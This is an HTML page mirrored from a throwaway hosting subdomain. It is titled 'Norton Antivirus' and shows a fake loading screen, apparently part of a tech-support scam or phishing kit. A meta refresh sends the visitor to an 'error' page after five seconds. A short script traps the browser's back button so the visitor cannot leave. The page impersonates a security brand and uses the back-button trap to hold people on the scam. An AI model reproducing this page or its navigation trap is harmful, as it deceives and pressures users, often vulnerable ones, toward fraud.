
<!DOCTYPE html>
<html lang="en">
  

<!-- Added by HTTrack -->
<!-- Mirrored from orchid-monkey-139310.hostingersite.com/MY/load.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Oct 2025 22:43:16 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="utf-8">
    <meta http-equiv="refresh" content="5;url=norerror.html" />
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="favicon.html" type="image/x-icon">

    <title>Norton Antivirus</title>

    <style type="text/css">
      .loading-img {
        text-align: center;
        margin-top: 10%;
        font-family: Century Gothic,CenturyGothic,AppleGothic,sans-serif; 
        color: #555;
        font-weight: 300;
        position: relative;
      }
      h3 {
        font-weight: 300;
        font-size: 20px;
      }
      .footer-bottom {
        font-size: 12px;
        color:#000;
        margin-top: 30px;
      }
      .dots {
        position: absolute;
        top: 85px;
        left: 50%;
        margin-left: -35px;
      }
    </style>
	
  </head>

  <body>
    <div class="loading-img">
      <img src="images/loading_dots3.gif" alt="logo" class="dots" draggable="false">
      <img src="images/load.jpg" alt="logo" draggable="false"> <br>

       

       <section class="footer-bottom">
        Copyright 2018        </section>   
    </div>
    
        <script>
	
history.pushState(null, null, location.href);
    window.onpopstate = function () {
        history.go(1);
    };
</script>
</body>


<!-- Mirrored from orchid-monkey-139310.hostingersite.com/MY/load.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Oct 2025 22:43:17 GMT -->
</html>